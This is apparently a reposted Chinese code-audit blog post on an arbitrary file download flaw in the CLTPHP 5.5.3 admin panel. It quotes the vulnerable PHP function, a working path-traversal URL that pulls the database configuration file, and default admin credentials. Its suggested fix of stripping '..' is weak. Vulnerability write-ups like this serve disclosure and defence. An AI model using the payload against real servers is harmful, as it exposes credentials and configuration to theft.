首页 > Web开发 > 详细

【代码审计】CLTPHP_v5.5.3后台任意文件下载漏洞分析

时间：2018-12-02 14:29:34 阅读：342 评论：0 收藏：0 [点我收藏+]

标签：str 网站 log center 技术分享 cat ade 下载文件删除

0x00 环境准备

CLTPHP官网：http://www.cltphp.com

网站源码版本：CLTPHP内容管理系统5.5.3版本

程序源码下载：https://gitee.com/chichu/cltphp

默认后台地址： http://127.0.0.1/admin/login/index.html

默认账号密码：后台登录名：admin 密码：admin123

测试网站首页：

技术分享图片

0x01 代码分析

1、/app/admin/controller/Database.php 第203-219行：

public function downFile() {
$file = $this->request->param(‘file‘);
$type = $this->request->param(‘type‘);
if (empty($file) || empty($type) || !in_array($type, array("zip", "sql"))) {
$this->error("下载地址不存在");
}
$path = array("zip" => $this->datadir."zipdata/", "sql" => $this->datadir);
$filePath = $path[$type] . $file;
if (!file_exists($filePath)) {
10. $this->error("该文件不存在，可能是被删除");
11. }
12. $filename = basename($filePath);
13. header("Content-type: application/octet-stream");
14. header(‘Content-Disposition: attachment; filename="‘ . $filename . ‘"‘);
15. header("Content-Length: " . filesize($filePath));
16. readfile($filePath);

17. }

在这段函数中，参数file未经任何处理，直接进行参数拼接，然后下载，导致程序在实现上存在任意文件下载漏洞，可以构造参数下载服务器任意文件，如脚本代码，服务及系统配置文件等；可用得到的代码进一步代码审计，得到更多可利用漏洞。

0x02 漏洞利用

1、登录网站后台，构造url参数下载网站配置文件：

http://127.0.0.1/admin/Database/downFile.html?type=sql&file=..\\..\\app\\database.php

技术分享图片

2、成功下载数据库配置文件，获取敏感信息内容

技术分享图片

0x03 修复建议

1、在下载前对传入的参数进行过滤，直接将..替换成空，就可以简单实现防范的目的

2、最好还是可以对待下载文件类型进行二次检查，判断是否允许下载类型。

最后

欢迎关注个人微信公众号：Bypass--，每周原创一篇技术干货。

技术分享图片

【代码审计】CLTPHP_v5.5.3后台任意文件下载漏洞分析

标签：str 网站 log center 技术分享 cat ade 下载文件删除

原文地址：https://www.cnblogs.com/xiaozi/p/10053117.html

踩

(0)

赞

(0)

举报

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行

更多

友情链接

兰亭集智国之画百度统计站长统计阿里云 chrome插件新版天听网

关于我们 - 联系我们 - 留言反馈

© 2014 mamicode.com 版权所有联系我们:gaon5@hotmail.com

迷上了代码！